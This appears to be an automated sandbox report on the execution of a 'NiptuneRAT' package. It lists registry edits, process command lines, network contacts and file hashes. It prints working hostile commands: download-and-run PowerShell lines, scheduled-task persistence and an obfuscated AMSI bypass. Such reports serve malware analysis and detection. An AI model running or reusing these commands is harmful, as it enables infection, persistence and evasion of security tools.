| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\MRUListEx = 00000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\NiptuneRAT-main\" -spe -an -ai#7zMap21379:88:7zEvent29350
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"
C:\Users\Admin\Desktop\$77NiptuneClient.exe
"C:\Users\Admin\Desktop\$77NiptuneClient.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat""
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell "irm rentry.co/System-Settings/raw | iex"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm rentry.co/System-Settings/raw | iex"
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiADUAWQBQAEQAdgBQAGkAUwBvAFYAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAHoANwA3AGYALwAzADYAMgA5ADcAMwAvAHIAYQB3AC8AbQBhAGkAbgAvACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwAkADcANwBBAFAAQwBPAE4AUwBWAEMALgBFAFgARQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AegA3ADcAZgAvADMANgAyADkANwAzAC8AcgBhAHcALwBtAGEAaQBuAC8AJAA3ADcAQQBQAEMATwBOAFMAVgBDAC4ARQBYAEUAJwA7ACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAnACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
"C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"
C:\Users\Admin\AppData\Roaming\$77.exe
"C:\Users\Admin\AppData\Roaming\$77.exe"
C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
"C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"
C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
"C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FmDvVBkCFmNM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTNynACjESgbSk,[Parameter(Position=1)][Type]$VUapLZDwuA)$svPFHJRydKw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+'te'+'d'+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'Typ'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$svPFHJRydKw.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HTNynACjESgbSk).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$svPFHJRydKw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$VUapLZDwuA,$HTNynACjESgbSk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $svPFHJRydKw.CreateType();}$rSoNzsfqtPNwC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in3'+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$SEhCBgwbBYuhRD=$rSoNzsfqtPNwC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OEZyTvETbOlFWBLYBao=FmDvVBkCFmNM @([String])([IntPtr]);$MmIGJVbffZIQsZzfFyzPEY=FmDvVBkCFmNM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iZqFqXMPixY=$rSoNzsfqtPNwC.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+'d'+'l'+''+'l'+'')));$DIKOvfvTMYXWPH=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('L'+'o'+'a'+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$DPSAFRPwolNENAHkq=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MpOZCuT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DIKOvfvTMYXWPH,$OEZyTvETbOlFWBLYBao).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$YwEVUxYEuFWntIEUg=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$MpOZCuT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$yBKdqcFeiQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,4,[ref]$yBKdqcFeiQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwEVUxYEuFWntIEUg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,0x20,[ref]$yBKdqcFeiQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{4f8ebf90-14cd-4bc7-b0be-fa6d0271da55}
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77TCPSVCS" /tr "C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE
C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.145.129:80 | rentry.co | tcp |
| US | 172.67.145.129:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 129.145.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| N/A | 127.0.0.1:1337 | tcp | |
| US | 172.67.145.129:443 | rentry.co | tcp |
| US | 147.185.221.18:36538 | tcp | |
| US | 8.8.8.8:53 | 18.221.185.147.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | c52733885f1aa485683b9289c4b45519 |
| SHA1 | 07c3faeb48670485bbefa9e3c35fc24da4f9411a |
| SHA256 | ca9dcd616882b3031c86f962b5cce07187a8a513d183b4f68d897d5687d45bd7 |
| SHA512 | 5fe1f30b412459cc5d71cd426c2bba9265e6c8f4ade5ddda052fe231ca4e036598c873c40441045abe591b8fcc6e850c2d691b179e44f02f3ce23d0effa4a5c2 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe
| MD5 | a6bf33461f36b6cc60df311818e13f16 |
| SHA1 | a18d8aec012db8d2b247b618087c860e134c7a57 |
| SHA256 | 7fb89d4f209ac6c6089783a2258a1b45d40686fb7624ad835263724e10477961 |
| SHA512 | 7faad74edc9282f3410fd3edcc8bedd4cba28fbb768b5c24cafa761503c7408b394296e905739f0105b76cde4fa24512cb2ea5610f4637a25de19f1792766ac0 |
C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config
| MD5 | 465c8716dc52edeaf09f0c61fc988934 |
| SHA1 | 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b |
| SHA256 | 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5 |
| SHA512 | 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c |
memory/3600-163-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp
memory/3600-164-0x00000189D49D0000-0x00000189D62FA000-memory.dmp
memory/3600-165-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/3600-166-0x00000189F07E0000-0x00000189F0A32000-memory.dmp
memory/3600-167-0x00000189F0E50000-0x00000189F1044000-memory.dmp
memory/3600-168-0x00000189F1400000-0x00000189F154E000-memory.dmp
memory/3600-169-0x00000189F1590000-0x00000189F15A4000-memory.dmp
memory/3600-170-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/3600-171-0x00000189FAB20000-0x00000189FB108000-memory.dmp
memory/3600-172-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/3600-173-0x00000189FA310000-0x00000189FA31A000-memory.dmp
memory/3600-174-0x00000189D8030000-0x00000189D8040000-memory.dmp
memory/3600-175-0x00000189F1A30000-0x00000189F1A42000-memory.dmp
memory/3600-176-0x00000189F1A50000-0x00000189F1CD0000-memory.dmp
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
| MD5 | 89974f21c462ad66165c03cc05a9b8a7 |
| SHA1 | 868b45d89fced9bf5cdc3e86e8eeb0698262deb4 |
| SHA256 | 9f61591699d7d9e3336bbe924e7826c1e8bedb7227045705d50eec264b1202ec |
| SHA512 | 7348faa61700741733da0b80fdb824366a7cb7d841c24d78d54971ba1d0fbe899f257f0c68792db5c1e05ca3afb4e6fbd251f8d369c903e227e9b7eba4f861b3 |
C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe.config
| MD5 | 0c02012f18e2755ce1bfaa8c81abe14e |
| SHA1 | b10ef760340682f09360019ddca35a2bc0eef3e1 |
| SHA256 | 93b3433679ee8d782f69e37136e207bd5e125f1ef79542bf9d7e84c1c84feea5 |
| SHA512 | c1ad192d040288433b5a618720de46199c94c71b17c8365a16aa7180179c7efbc8ff77e590c1dcfc1e8d6caa1223446b9458663f5dc7ccd861ee3afb6bc99787 |
